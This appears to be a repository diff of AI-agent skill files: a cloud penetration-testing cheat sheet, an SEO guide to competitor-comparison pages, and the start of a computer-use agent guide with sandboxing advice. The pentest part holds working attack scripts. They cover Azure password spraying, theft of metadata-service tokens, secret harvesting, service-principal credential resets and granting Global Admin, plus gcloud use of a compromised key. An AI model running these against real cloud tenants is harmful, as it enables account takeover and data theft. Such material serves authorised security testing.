# Authenticate with service account key
gcloud auth activate-service-account --key-file compromised-sa.json
# List accessible projects
gcloud projects list
# Enumerate compute instances
gcloud compute instances list --project target-project
# Check for SSH keys in metadata
gcloud compute project-info describe --project target-project | grep ssh
# SSH to instance
gcloud beta compute ssh instance-name --zone us-central1-a --project target-project
```
## Troubleshooting
| Issue | Solutions |
|-------|-----------|
| Authentication failures | Verify credentials; check MFA; ensure correct tenant/project; try alternative auth methods |
| Permission denied | List current roles; try different resources; check resource policies; verify region |
| Metadata service blocked | Check IMDSv2 (AWS); verify instance role; check firewall for 169.254.169.254 |
| Rate limiting | Add delays; spread across regions; use multiple credentials; focus on high-value targets |
## References
- [Advanced Cloud Scripts](references/advanced-cloud-scripts.md) - Azure Automation runbooks, Function Apps enumeration, AWS data exfiltration, GCP advanced exploitation

318
skills/cloud-penetration-testing/references/advanced-cloud-scripts.md Normal file
View File

@@ -0,0 +1,318 @@
# Advanced Cloud Pentesting Scripts
Reference: [Cloud Pentesting Cheatsheet by Beau Bullock](https://github.com/dafthack/CloudPentestCheatsheets)
## Azure Automation Runbooks
### Export All Runbooks from All Subscriptions
```powershell
$subs = Get-AzSubscription
Foreach($s in $subs){
$subscriptionid = $s.SubscriptionId
mkdir .\$subscriptionid\
Select-AzSubscription -Subscription $subscriptionid
$runbooks = @()
$autoaccounts = Get-AzAutomationAccount | Select-Object AutomationAccountName,ResourceGroupName
foreach ($i in $autoaccounts){
$runbooks += Get-AzAutomationRunbook -AutomationAccountName $i.AutomationAccountName -ResourceGroupName $i.ResourceGroupName | Select-Object AutomationAccountName,ResourceGroupName,Name
}
foreach($r in $runbooks){
Export-AzAutomationRunbook -AutomationAccountName $r.AutomationAccountName -ResourceGroupName $r.ResourceGroupName -Name $r.Name -OutputFolder .\$subscriptionid\
}
}
```
### Export All Automation Job Outputs
```powershell
$subs = Get-AzSubscription
$jobout = @()
Foreach($s in $subs){
$subscriptionid = $s.SubscriptionId
Select-AzSubscription -Subscription $subscriptionid
$jobs = @()
$autoaccounts = Get-AzAutomationAccount | Select-Object AutomationAccountName,ResourceGroupName
foreach ($i in $autoaccounts){
$jobs += Get-AzAutomationJob $i.AutomationAccountName -ResourceGroupName $i.ResourceGroupName | Select-Object AutomationAccountName,ResourceGroupName,JobId
}
foreach($r in $jobs){
$jobout += Get-AzAutomationJobOutput -AutomationAccountName $r.AutomationAccountName -ResourceGroupName $r.ResourceGroupName -JobId $r.JobId
}
}
$jobout | Out-File -Encoding ascii joboutputs.txt
```
## Azure Function Apps
### List All Function App Hostnames
```powershell
$functionapps = Get-AzFunctionApp
foreach($f in $functionapps){
$f.EnabledHostname
}
```
### Extract Function App Information
```powershell
$subs = Get-AzSubscription
$allfunctioninfo = @()
Foreach($s in $subs){
$subscriptionid = $s.SubscriptionId
Select-AzSubscription -Subscription $subscriptionid
$functionapps = Get-AzFunctionApp
foreach($f in $functionapps){
$allfunctioninfo += $f.config | Select-Object AcrUseManagedIdentityCred,AcrUserManagedIdentityId,AppCommandLine,ConnectionString,CorSupportCredentials,CustomActionParameter
$allfunctioninfo += $f.SiteConfig | fl
$allfunctioninfo += $f.ApplicationSettings | fl
$allfunctioninfo += $f.IdentityUserAssignedIdentity.Keys | fl
}
}
$allfunctioninfo
```
## Azure Device Code Login Flow
### Initiate Device Code Login
```powershell
$body = @{
"client_id" = "1950a258-227b-4e31-a9cf-717495945fc2"
"resource" = "https://graph.microsoft.com"
}
$UserAgent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
$Headers = @{}
$Headers["User-Agent"] = $UserAgent
$authResponse = Invoke-RestMethod `
-UseBasicParsing `
-Method Post `
-Uri "https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0" `
-Headers $Headers `
-Body $body
$authResponse
```
Navigate to https://microsoft.com/devicelogin and enter the code.
### Retrieve Access Tokens
```powershell
$body = @{
"client_id" = "1950a258-227b-4e31-a9cf-717495945fc2"
"grant_type" = "urn:ietf:params:oauth:grant-type:device_code"
"code" = $authResponse.device_code
}
$Tokens = Invoke-RestMethod `
-UseBasicParsing `
-Method Post `
-Uri "https://login.microsoftonline.com/Common/oauth2/token?api-version=1.0" `
-Headers $Headers `
-Body $body
$Tokens
```
## Azure Managed Identity Token Retrieval
```powershell
# From Azure VM
Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com' -Method GET -Headers @{Metadata="true"} -UseBasicParsing
# Full instance metadata
$instance = Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/instance?api-version=2018-02-01' -Method GET -Headers @{Metadata="true"} -UseBasicParsing
$instance
```
## AWS Region Iteration Scripts
Create `regions.txt`:
```
us-east-1
us-east-2
us-west-1
us-west-2
ca-central-1
eu-west-1
eu-west-2
eu-west-3
eu-central-1
eu-north-1
ap-southeast-1
ap-southeast-2
ap-south-1
ap-northeast-1
ap-northeast-2
ap-northeast-3
sa-east-1
```
### List All EC2 Public IPs
```bash
while read r; do
aws ec2 describe-instances --query=Reservations[].Instances[].PublicIpAddress --region $r | jq -r '.[]' >> ec2-public-ips.txt
done < regions.txt
sort -u ec2-public-ips.txt -o ec2-public-ips.txt
```
### List All ELB DNS Addresses
```bash
while read r; do
aws elbv2 describe-load-balancers --query LoadBalancers[*].DNSName --region $r | jq -r '.[]' >> elb-public-dns.txt
aws elb describe-load-balancers --query LoadBalancerDescriptions[*].DNSName --region $r | jq -r '.[]' >> elb-public-dns.txt
done < regions.txt
sort -u elb-public-dns.txt -o elb-public-dns.txt
```
### List All RDS DNS Addresses
```bash
while read r; do
aws rds describe-db-instances --query=DBInstances[*].Endpoint.Address --region $r | jq -r '.[]' >> rds-public-dns.txt
done < regions.txt
sort -u rds-public-dns.txt -o rds-public-dns.txt
```
### Get CloudFormation Outputs
```bash
while read r; do
aws cloudformation describe-stacks --query 'Stacks[*].[StackName, Description, Parameters, Outputs]' --region $r | jq -r '.[]' >> cloudformation-outputs.txt
done < regions.txt
```
## ScoutSuite jq Parsing Queries
### AWS Queries
```bash
# Find All Lambda Environment Variables
for d in */ ; do
tail $d/scoutsuite-results/scoutsuite_results*.js -n +2 | jq '.services.awslambda.regions[].functions[] | select (.env_variables != []) | .arn, .env_variables' >> lambda-all-environment-variables.txt
done
# Find World Listable S3 Buckets
for d in */ ; do
tail $d/scoutsuite-results/scoutsuite_results*.js -n +2 | jq '.account_id, .services.s3.findings."s3-bucket-AuthenticatedUsers-read".items[]' >> s3-buckets-world-listable.txt
done
# Find All EC2 User Data
for d in */ ; do
tail $d/scoutsuite-results/scoutsuite_results*.js -n +2 | jq '.services.ec2.regions[].vpcs[].instances[] | select (.user_data != null) | .arn, .user_data' >> ec2-instance-all-user-data.txt
done
# Find EC2 Security Groups That Whitelist AWS CIDRs
for d in */ ; do
tail $d/scoutsuite-results/scoutsuite_results*.js -n +2 | jq '.account_id' >> ec2-security-group-whitelists-aws-cidrs.txt
tail $d/scoutsuite-results/scoutsuite_results*.js -n +2 | jq '.services.ec2.findings."ec2-security-group-whitelists-aws".items' >> ec2-security-group-whitelists-aws-cidrs.txt
done
# Find All EC2 EBS Volumes Unencrypted
for d in */ ; do
tail $d/scoutsuite-results/scoutsuite_results*.js -n +2 | jq '.services.ec2.regions[].volumes[] | select(.Encrypted == false) | .arn' >> ec2-ebs-volume-not-encrypted.txt
done
# Find All EC2 EBS Snapshots Unencrypted
for d in */ ; do
tail $d/scoutsuite-results/scoutsuite_results*.js -n +2 | jq '.services.ec2.regions[].snapshots[] | select(.encrypted == false) | .arn' >> ec2-ebs-snapshot-not-encrypted.txt
done
```
### Azure Queries
```bash
# List All Azure App Service Host Names
tail scoutsuite_results_azure-tenant-*.js -n +2 | jq -r '.services.appservice.subscriptions[].web_apps[].host_names[]'
# List All Azure SQL Servers
tail scoutsuite_results_azure-tenant-*.js -n +2 | jq -jr '.services.sqldatabase.subscriptions[].servers[] | .name,".database.windows.net","\n"'
# List All Azure Virtual Machine Hostnames
tail scoutsuite_results_azure-tenant-*.js -n +2 | jq -jr '.services.virtualmachines.subscriptions[].instances[] | .name,".",.location,".cloudapp.windows.net","\n"'
# List Storage Accounts
tail scoutsuite_results_azure-tenant-*.js -n +2 | jq -r '.services.storageaccounts.subscriptions[].storage_accounts[] | .name'
# List Disks Encrypted with Platform Managed Keys
tail scoutsuite_results_azure-tenant-*.js -n +2 | jq '.services.virtualmachines.subscriptions[].disks[] | select(.encryption_type = "EncryptionAtRestWithPlatformKey") | .name' > disks-with-pmks.txt
```
## Password Spraying with Az PowerShell
```powershell
$userlist = Get-Content userlist.txt
$passlist = Get-Content passlist.txt
$linenumber = 0
$count = $userlist.count
foreach($line in $userlist){
$user = $line
$pass = ConvertTo-SecureString $passlist[$linenumber] -AsPlainText -Force
$current = $linenumber + 1
Write-Host -NoNewline ("`r[" + $current + "/" + $count + "]" + "Trying: " + $user + " and " + $passlist[$linenumber])
$linenumber++
$Cred = New-Object System.Management.Automation.PSCredential ($user, $pass)
try {
Connect-AzAccount -Credential $Cred -ErrorAction Stop -WarningAction SilentlyContinue
Add-Content valid-creds.txt ($user + "|" + $passlist[$linenumber - 1])
Write-Host -ForegroundColor green ("`nGot something here: $user and " + $passlist[$linenumber - 1])
}
catch {
$Failure = $_.Exception
if ($Failure -match "ID3242") { continue }
else {
Write-Host -ForegroundColor green ("`nGot something here: $user and " + $passlist[$linenumber - 1])
Add-Content valid-creds.txt ($user + "|" + $passlist[$linenumber - 1])
Add-Content valid-creds.txt $Failure.Message
Write-Host -ForegroundColor red $Failure.Message
}
}
}
```
## Service Principal Attack Path
```bash
# Reset service principal credential
az ad sp credential reset --id <app_id>
az ad sp credential list --id <app_id>
# Login as service principal
az login --service-principal -u "app id" -p "password" --tenant <tenant ID> --allow-no-subscriptions
# Create new user in tenant
az ad user create --display-name <name> --password <password> --user-principal-name <upn>
# Add user to Global Admin via MS Graph
$Body="{'principalId':'User Object ID', 'roleDefinitionId': '62e90394-69f5-4237-9190-012177145e10', 'directoryScopeId': '/'}"
az rest --method POST --uri https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignments --headers "Content-Type=application/json" --body $Body
```
## Additional Tools Reference
| Tool | URL | Purpose |
|------|-----|---------|
| MicroBurst | github.com/NetSPI/MicroBurst | Azure security assessment |
| PowerZure | github.com/hausec/PowerZure | Azure post-exploitation |
| ROADTools | github.com/dirkjanm/ROADtools | Azure AD enumeration |
| Stormspotter | github.com/Azure/Stormspotter | Azure attack path graphing |
| MSOLSpray | github.com/dafthack | O365 password spraying |
| AzureHound | github.com/BloodHoundAD/AzureHound | Azure AD attack paths |
| WeirdAAL | github.com/carnal0wnage/weirdAAL | AWS enumeration |
| Pacu | github.com/RhinoSecurityLabs/pacu | AWS exploitation |
| ScoutSuite | github.com/nccgroup/ScoutSuite | Multi-cloud auditing |
| cloud_enum | github.com/initstring/cloud_enum | Public resource discovery |
| GitLeaks | github.com/zricethezav/gitleaks | Secret scanning |
| TruffleHog | github.com/dxa4481/truffleHog | Git secret scanning |
| ip2Provider | github.com/oldrho/ip2provider | Cloud IP identification |
| FireProx | github.com/ustayready/fireprox | IP rotation via AWS API Gateway |
## Vulnerable Training Environments
| Platform | URL | Purpose |
|----------|-----|---------|
| CloudGoat | github.com/RhinoSecurityLabs/cloudgoat | AWS vulnerable lab |
| SadCloud | github.com/nccgroup/sadcloud | Terraform misconfigs |
| Flaws Cloud | flaws.cloud | AWS CTF challenges |
| Thunder CTF | thunder-ctf.cloud | GCP CTF challenges |

750
skills/competitor-alternatives/SKILL.md Normal file
View File

@@ -0,0 +1,750 @@
---
name: competitor-alternatives
description: "When the user wants to create competitor comparison or alternative pages for SEO and sales enablement. Also use when the user mentions 'alternative page,' 'vs page,' 'competitor comparison,' 'comparison page,' '[Product] vs [Product],' '[Product] alternative,' or 'competitive landing pages.' Covers four formats: singular alternative, plural alternatives, you vs competitor, and competitor vs competitor. Emphasizes deep research, modular content architecture, and varied section types beyond feature tables."
---
# Competitor & Alternative Pages
You are an expert in creating competitor comparison and alternative pages. Your goal is to build pages that rank for competitive search terms, provide genuine value to evaluators, and position your product effectively.
## Initial Assessment
Before creating competitor pages, understand:
1. **Your Product**
- Core value proposition
- Key differentiators
- Ideal customer profile
- Pricing model
- Strengths and honest weaknesses
2. **Competitive Landscape**
- Direct competitors
- Indirect/adjacent competitors
- Market positioning of each
- Search volume for competitor terms
3. **Goals**
- SEO traffic capture
- Sales enablement
- Conversion from competitor users
- Brand positioning
---
## Core Principles
### 1. Honesty Builds Trust
- Acknowledge competitor strengths
- Be accurate about your limitations
- Don't misrepresent competitor features
- Readers are comparing—they'll verify claims
### 2. Depth Over Surface
- Go beyond feature checklists
- Explain *why* differences matter
- Include use cases and scenarios
- Show, don't just tell
### 3. Help Them Decide
- Different tools fit different needs
- Be clear about who you're best for
- Be clear about who competitor is best for
- Reduce evaluation friction
### 4. Modular Content Architecture
- Competitor data should be centralized
- Updates propagate to all pages
- Avoid duplicating research
- Single source of truth per competitor
---
## Page Formats
### Format 1: [Competitor] Alternative (Singular)
**Search intent**: User is actively looking to switch from a specific competitor
**URL pattern**: `/alternatives/[competitor]` or `/[competitor]-alternative`
**Target keywords**:
- "[Competitor] alternative"
- "alternative to [Competitor]"
- "switch from [Competitor]"
- "[Competitor] replacement"
**Page structure**:
1. Why people look for alternatives (validate their pain)
2. Summary: You as the alternative (quick positioning)
3. Detailed comparison (features, service, pricing)
4. Who should switch (and who shouldn't)
5. Migration path
6. Social proof from switchers
7. CTA
**Tone**: Empathetic to their frustration, helpful guide
---
### Format 2: [Competitor] Alternatives (Plural)
**Search intent**: User is researching options, earlier in journey
**URL pattern**: `/alternatives/[competitor]-alternatives` or `/best-[competitor]-alternatives`
**Target keywords**:
- "[Competitor] alternatives"
- "best [Competitor] alternatives"
- "tools like [Competitor]"
- "[Competitor] competitors"
**Page structure**:
1. Why people look for alternatives (common pain points)
2. What to look for in an alternative (criteria framework)
3. List of alternatives (you first, but include real options)
4. Comparison table (summary)
5. Detailed breakdown of each alternative
6. Recommendation by use case
7. CTA
**Tone**: Objective guide, you're one option among several (but positioned well)
**Important**: Include 4-7 real alternatives. Being genuinely helpful builds trust and ranks better.
---
### Format 3: You vs [Competitor]
**Search intent**: User is directly comparing you to a specific competitor
**URL pattern**: `/vs/[competitor]` or `/compare/[you]-vs-[competitor]`
**Target keywords**:
- "[You] vs [Competitor]"
- "[Competitor] vs [You]"
- "[You] compared to [Competitor]"
- "[You] or [Competitor]"
**Page structure**:
1. TL;DR summary (key differences in 2-3 sentences)
2. At-a-glance comparison table
3. Detailed comparison by category:
- Features
- Pricing
- Service & support
- Ease of use
- Integrations
4. Who [You] is best for
5. Who [Competitor] is best for (be honest)
6. What customers say (testimonials from switchers)
7. Migration support
8. CTA
**Tone**: Confident but fair, acknowledge where competitor excels
---
### Format 4: [Competitor A] vs [Competitor B]
**Search intent**: User comparing two competitors (not you directly)
**URL pattern**: `/compare/[competitor-a]-vs-[competitor-b]`
**Target keywords**:
- "[Competitor A] vs [Competitor B]"
- "[Competitor A] or [Competitor B]"
- "[Competitor A] compared to [Competitor B]"
**Page structure**:
1. Overview of both products
2. Comparison by category
3. Who each is best for
4. The third option (introduce yourself)
5. Comparison table (all three)
6. CTA
**Tone**: Objective analyst, earn trust through fairness, then introduce yourself
**Why this works**: Captures search traffic for competitor terms, positions you as knowledgeable, introduces you to qualified audience.
---
## Index Pages
Each format needs an index page that lists all pages of that type. These hub pages serve as navigation aids, SEO consolidators, and entry points for visitors exploring multiple comparisons.
### Alternatives Index
**URL**: `/alternatives` or `/alternatives/index`
**Purpose**: Lists all "[Competitor] Alternative" pages
**Page structure**:
1. Headline: "[Your Product] as an Alternative"
2. Brief intro on why people switch to you
3. List of all alternative pages with:
- Competitor name/logo
- One-line summary of key differentiator vs. that competitor
- Link to full comparison
4. Common reasons people switch (aggregated)
5. CTA
**Example**:
```markdown
## Explore [Your Product] as an Alternative
Looking to switch? See how [Your Product] compares to the tools you're evaluating:
- **[Notion Alternative](/alternatives/notion)** — Better for teams who need [X]
- **[Airtable Alternative](/alternatives/airtable)** — Better for teams who need [Y]
- **[Monday Alternative](/alternatives/monday)** — Better for teams who need [Z]
```
---
### Alternatives (Plural) Index
**URL**: `/alternatives/compare` or `/best-alternatives`
**Purpose**: Lists all "[Competitor] Alternatives" roundup pages
**Page structure**:
1. Headline: "Software Alternatives & Comparisons"
2. Brief intro on your comparison methodology
3. List of all alternatives roundup pages with:
- Competitor name
- Number of alternatives covered
- Link to roundup
4. CTA
**Example**:
```markdown
## Find the Right Tool
Comparing your options? Our guides cover the top alternatives:
- **[Best Notion Alternatives](/alternatives/notion-alternatives)** — 7 tools compared
- **[Best Airtable Alternatives](/alternatives/airtable-alternatives)** — 6 tools compared
- **[Best Monday Alternatives](/alternatives/monday-alternatives)** — 5 tools compared
```
---
### Vs Comparisons Index
**URL**: `/vs` or `/compare`
**Purpose**: Lists all "You vs [Competitor]" and "[A] vs [B]" pages
**Page structure**:
1. Headline: "Compare [Your Product]"
2. Section: "[Your Product] vs Competitors" — list of direct comparisons
3. Section: "Head-to-Head Comparisons" — list of [A] vs [B] pages
4. Brief methodology note
5. CTA
**Example**:
```markdown
## Compare [Your Product]
### [Your Product] vs. the Competition
- **[[Your Product] vs Notion](/vs/notion)** — Best for [differentiator]
- **[[Your Product] vs Airtable](/vs/airtable)** — Best for [differentiator]
- **[[Your Product] vs Monday](/vs/monday)** — Best for [differentiator]
### Other Comparisons
Evaluating tools we compete with? We've done the research:
- **[Notion vs Airtable](/compare/notion-vs-airtable)**
- **[Notion vs Monday](/compare/notion-vs-monday)**
- **[Airtable vs Monday](/compare/airtable-vs-monday)**
```
---
### Index Page Best Practices
**Keep them updated**: When you add a new comparison page, add it to the relevant index.
**Internal linking**:
- Link from index → individual pages
- Link from individual pages → back to index
- Cross-link between related comparisons
**SEO value**:
- Index pages can rank for broad terms like "project management tool comparisons"
- Pass link equity to individual comparison pages
- Help search engines discover all comparison content
**Sorting options**:
- By popularity (search volume)
- Alphabetically
- By category/use case
- By date added (show freshness)
**Include on index pages**:
- Last updated date for credibility
- Number of pages/comparisons available
- Quick filters if you have many comparisons
---
## Content Architecture
### Centralized Competitor Data
Create a single source of truth for each competitor:
```
competitor_data/
├── notion.md
├── airtable.md
├── monday.md
└── ...
```
**Per competitor, document**:
```yaml
name: Notion
website: notion.so
tagline: "The all-in-one workspace"
founded: 2016
headquarters: San Francisco
# Positioning
primary_use_case: "docs + light databases"
target_audience: "teams wanting flexible workspace"
market_position: "premium, feature-rich"
# Pricing
pricing_model: per-seat
free_tier: true
free_tier_limits: "limited blocks, 1 user"
starter_price: $8/user/month
business_price: $15/user/month
enterprise: custom
# Features (rate 1-5 or describe)
features:
documents: 5
databases: 4
project_management: 3
collaboration: 4
integrations: 3
mobile_app: 3
offline_mode: 2
api: 4
# Strengths (be honest)
strengths:
- Extremely flexible and customizable
- Beautiful, modern interface
- Strong template ecosystem
- Active community
# Weaknesses (be fair)
weaknesses:
- Can be slow with large databases
- Learning curve for advanced features
- Limited automations compared to dedicated tools
- Offline mode is limited
# Best for
best_for:
- Teams wanting all-in-one workspace
- Content-heavy workflows
- Documentation-first teams
- Startups and small teams
# Not ideal for
not_ideal_for:
- Complex project management needs
- Large databases (1000s of rows)
- Teams needing robust offline
- Enterprise with strict compliance
# Common complaints (from reviews)
common_complaints:
- "Gets slow with lots of content"
- "Hard to find things as workspace grows"
- "Mobile app is clunky"
# Migration notes
migration_from:
difficulty: medium
data_export: "Markdown, CSV, HTML"
what_transfers: "Pages, databases"
what_doesnt: "Automations, integrations setup"
time_estimate: "1-3 days for small team"
```
### Your Product Data
Same structure for yourself—be honest:
```yaml
name: [Your Product]
# ... same fields
strengths:
- [Your real strengths]
weaknesses:
- [Your honest weaknesses]
best_for:
- [Your ideal customers]
not_ideal_for:
- [Who should use something else]
```
### Page Generation
Each page pulls from centralized data:
- **[Competitor] Alternative page**: Pulls competitor data + your data
- **[Competitor] Alternatives page**: Pulls competitor data + your data + other alternatives
- **You vs [Competitor] page**: Pulls your data + competitor data
- **[A] vs [B] page**: Pulls both competitor data + your data
**Benefits**:
- Update competitor pricing once, updates everywhere
- Add new feature comparison once, appears on all pages
- Consistent accuracy across pages
- Easier to maintain at scale
---
## Section Templates
### TL;DR Summary
Start every page with a quick summary for scanners:
```markdown
**TL;DR**: [Competitor] excels at [strength] but struggles with [weakness].
[Your product] is built for [your focus], offering [key differentiator].
Choose [Competitor] if [their ideal use case]. Choose [You] if [your ideal use case].
```
### Paragraph Comparison (Not Just Tables)
For each major dimension, write a paragraph:
```markdown
## Features
[Competitor] offers [description of their feature approach].
Their strength is [specific strength], which works well for [use case].
However, [limitation] can be challenging for [user type].
[Your product] takes a different approach with [your approach].
This means [benefit], though [honest tradeoff].
Teams who [specific need] often find this more effective.
```
### Feature Comparison Section
Go beyond checkmarks:
```markdown
## Feature Comparison
### [Feature Category]
**[Competitor]**: [2-3 sentence description of how they handle this]
- Strengths: [specific]
- Limitations: [specific]
**[Your product]**: [2-3 sentence description]
- Strengths: [specific]
- Limitations: [specific]
**Bottom line**: Choose [Competitor] if [scenario]. Choose [You] if [scenario].
```
### Pricing Comparison Section
```markdown
## Pricing
| | [Competitor] | [Your Product] |
|---|---|---|
| Free tier | [Details] | [Details] |
| Starting price | $X/user/mo | $X/user/mo |
| Business tier | $X/user/mo | $X/user/mo |
| Enterprise | Custom | Custom |
**What's included**: [Competitor]'s $X plan includes [features], while
[Your product]'s $X plan includes [features].
**Total cost consideration**: Beyond per-seat pricing, consider [hidden costs,
add-ons, implementation]. [Competitor] charges extra for [X], while
[Your product] includes [Y] in base pricing.
**Value comparison**: For a 10-person team, [Competitor] costs approximately
$X/year while [Your product] costs $Y/year, with [key differences in what you get].
```
### Service & Support Comparison
```markdown
## Service & Support
| | [Competitor] | [Your Product] |
|---|---|---|
| Documentation | [Quality assessment] | [Quality assessment] |
| Response time | [SLA if known] | [Your SLA] |
| Support channels | [List] | [List] |
| Onboarding | [What they offer] | [What you offer] |
| CSM included | [At what tier] | [At what tier] |
**Support quality**: Based on [G2/Capterra reviews, your research],
[Competitor] support is described as [assessment]. Common feedback includes
[quotes or themes].
[Your product] offers [your support approach]. [Specific differentiator like
response time, dedicated CSM, implementation help].
```
### Who It's For Section
```markdown
## Who Should Choose [Competitor]
[Competitor] is the right choice if:
- [Specific use case or need]
- [Team type or size]
- [Workflow or requirement]
- [Budget or priority]
**Ideal [Competitor] customer**: [Persona description in 1-2 sentences]
## Who Should Choose [Your Product]
[Your product] is built for teams who:
- [Specific use case or need]
- [Team type or size]
- [Workflow or requirement]
- [Priority or value]
**Ideal [Your product] customer**: [Persona description in 1-2 sentences]
```
### Migration Section
```markdown
## Switching from [Competitor]
### What transfers
- [Data type]: [How easily, any caveats]
- [Data type]: [How easily, any caveats]
### What needs reconfiguration
- [Thing]: [Why and effort level]
- [Thing]: [Why and effort level]
### Migration support
We offer [migration support details]:
- [Free data import tool / white-glove migration]
- [Documentation / migration guide]
- [Timeline expectation]
- [Support during transition]
### What customers say about switching
> "[Quote from customer who switched]"
> — [Name], [Role] at [Company]
```
### Social Proof Section
Focus on switchers:
```markdown
## What Customers Say
### Switched from [Competitor]
> "[Specific quote about why they switched and outcome]"
> — [Name], [Role] at [Company]
> "[Another quote]"
> — [Name], [Role] at [Company]
### Results after switching
- [Company] saw [specific result]
- [Company] reduced [metric] by [amount]
```
---
## Comparison Table Best Practices
### Beyond Checkmarks
Instead of:
| Feature | You | Competitor |
|---------|-----|-----------|
| Feature A | ✓ | ✓ |
| Feature B | ✓ | ✗ |
Do this:
| Feature | You | Competitor |
|---------|-----|-----------|
| Feature A | Full support with [detail] | Basic support, [limitation] |
| Feature B | [Specific capability] | Not available |
### Organize by Category
Group features into meaningful categories:
- Core functionality
- Collaboration
- Integrations
- Security & compliance
- Support & service
### Include Ratings Where Useful
| Category | You | Competitor | Notes |
|----------|-----|-----------|-------|
| Ease of use | ⭐⭐⭐⭐⭐ | ⭐⭐⭐⭐ | [Brief note] |
| Feature depth | ⭐⭐⭐⭐ | ⭐⭐⭐⭐⭐ | [Brief note] |
---
## Research Process
### Deep Competitor Research
For each competitor, gather:
1. **Product research**
- Sign up for free trial
- Use the product yourself
- Document features, UX, limitations
- Take screenshots
2. **Pricing research**
- Current pricing (check regularly)
- What's included at each tier
- Hidden costs, add-ons
- Contract terms
3. **Review mining**
- G2, Capterra, TrustRadius reviews
- Common praise themes
- Common complaint themes
- Ratings by category
4. **Customer feedback**
- Talk to customers who switched
- Talk to prospects who chose competitor
- Document real quotes
5. **Content research**
- Their positioning and messaging
- Their comparison pages (how do they compare to you?)
- Their documentation quality
- Their changelog (recent development)
### Ongoing Updates
Competitor pages need maintenance:
- **Quarterly**: Verify pricing, check for major feature changes
- **When notified**: Customer mentions competitor change
- **Annually**: Full refresh of all competitor data
---
## SEO Considerations
### Keyword Targeting
| Format | Primary Keywords | Secondary Keywords |
|--------|-----------------|-------------------|
| Alternative (singular) | [Competitor] alternative | alternative to [Competitor], switch from [Competitor], [Competitor] replacement |
| Alternatives (plural) | [Competitor] alternatives | best [Competitor] alternatives, tools like [Competitor], [Competitor] competitors |
| You vs Competitor | [You] vs [Competitor] | [Competitor] vs [You], [You] compared to [Competitor] |
| Competitor vs Competitor | [A] vs [B] | [B] vs [A], [A] or [B], [A] compared to [B] |
### Internal Linking
- Link between related competitor pages
- Link from feature pages to relevant comparisons
- Link from blog posts mentioning competitors
- Hub page linking to all competitor content
### Schema Markup
Consider FAQ schema for common questions:
```json
{
"@type": "FAQPage",
"mainEntity": [
{
"@type": "Question",
"name": "What is the best alternative to [Competitor]?",
"acceptedAnswer": {
"@type": "Answer",
"text": "[Your answer positioning yourself]"
}
}
]
}
```
---
## Output Format
### Competitor Data File
```yaml
# [competitor].yaml
# Complete competitor profile for use across all comparison pages
```
### Page Content
For each page:
- URL and meta tags
- Full page copy organized by section
- Comparison tables
- CTAs
### Page Set Plan
Recommended pages to create:
1. [List of alternative pages]
2. [List of vs pages]
3. Priority order based on search volume
---
## Questions to Ask
If you need more context:
1. Who are your top 3-5 competitors?
2. What's your core differentiator?
3. What are common reasons people switch to you?
4. Do you have customer quotes about switching?
5. What's your pricing vs. competitors?
6. Do you offer migration support?
---
## Related Skills
- **programmatic-seo**: For building competitor pages at scale
- **copywriting**: For writing compelling comparison copy
- **seo-audit**: For optimizing competitor pages
- **schema-markup**: For FAQ and comparison schema

315
skills/computer-use-agents/SKILL.md Normal file
View File

@@ -0,0 +1,315 @@
---
name: computer-use-agents
description: "Build AI agents that interact with computers like humans do - viewing screens, moving cursors, clicking buttons, and typing text. Covers Anthropic's Computer Use, OpenAI's Operator/CUA, and open-source alternatives. Critical focus on sandboxing, security, and handling the unique challenges of vision-based control. Use when: computer use, desktop automation agent, screen control AI, vision-based agent, GUI automation."
source: vibeship-spawner-skills (Apache 2.0)
---
# Computer Use Agents
## Patterns
### Perception-Reasoning-Action Loop
The fundamental architecture of computer use agents: observe screen,
reason about next action, execute action, repeat. This loop integrates
vision models with action execution through an iterative pipeline.
Key components:
1. PERCEPTION: Screenshot captures current screen state
2. REASONING: Vision-language model analyzes and plans
3. ACTION: Execute mouse/keyboard operations
4. FEEDBACK: Observe result, continue or correct
Critical insight: Vision agents are completely still during "thinking"
phase (1-5 seconds), creating a detectable pause pattern.
**When to use**: ['Building any computer use agent from scratch', 'Integrating vision models with desktop control', 'Understanding agent behavior patterns']
```python
from anthropic import Anthropic
from PIL import Image
import base64
import pyautogui
import time
class ComputerUseAgent:
"""
Perception-Reasoning-Action loop implementation.
Based on Anthropic Computer Use patterns.
"""
def __init__(self, client: Anthropic, model: str = "claude-sonnet-4-20250514"):
self.client = client
self.model = model
self.max_steps = 50 # Prevent runaway loops
self.action_delay = 0.5 # Seconds between actions
def capture_screenshot(self) -> str:
"""Capture screen and return base64 encoded image."""
screenshot = pyautogui.screenshot()
# Resize for token efficiency (1280x800 is good balance)
screenshot = screenshot.resize((1280, 800), Image.LANCZOS)
import io
buffer = io.BytesIO()
screenshot.save(buffer, format="PNG")
return base64.b64encode(buffer.getvalue()).decode()
def execute_action(self, action: dict) -> dict:
"""Execute mouse/keyboard action on the computer."""
action_type = action.get("type")
if action_type == "click":
x, y = action["x"], action["y"]
button = action.get("button", "left")
pyautogui.click(x, y, button=button)
return {"success": True, "action": f"clicked at ({x}, {y})"}
elif action_type == "type":
text = action["text"]
pyautogui.typewrite(text, interval=0.02)
return {"success": True, "action": f"typed {len(text)} chars"}
elif action_type == "key":
key = action["key"]
pyautogui.press(key)
return {"success": True, "action": f"pressed {key}"}
elif action_type == "scroll":
direction = action.get("direction", "down")
amount = action.get("amount", 3)
scroll = -amount if direction == "down" else amount
pyautogui.scroll(scroll)
return {"success": True, "action": f"scrolled {dir
```
### Sandboxed Environment Pattern
Computer use agents MUST run in isolated, sandboxed environments.
Never give agents direct access to your main system - the security
risks are too high. Use Docker containers with virtual desktops.
Key isolation requirements:
1. NETWORK: Restrict to necessary endpoints only
2. FILESYSTEM: Read-only or scoped to temp directories
3. CREDENTIALS: No access to host credentials
4. SYSCALLS: Filter dangerous system calls
5. RESOURCES: Limit CPU, memory, time
The goal is "blast radius minimization" - if the agent goes wrong,
damage is contained to the sandbox.
**When to use**: ['Deploying any computer use agent', 'Testing agent behavior safely', 'Running untrusted automation tasks']
```python
# Dockerfile for sandboxed computer use environment
# Based on Anthropic's reference implementation pattern
FROM ubuntu:22.04
# Install desktop environment
RUN apt-get update && apt-get install -y \
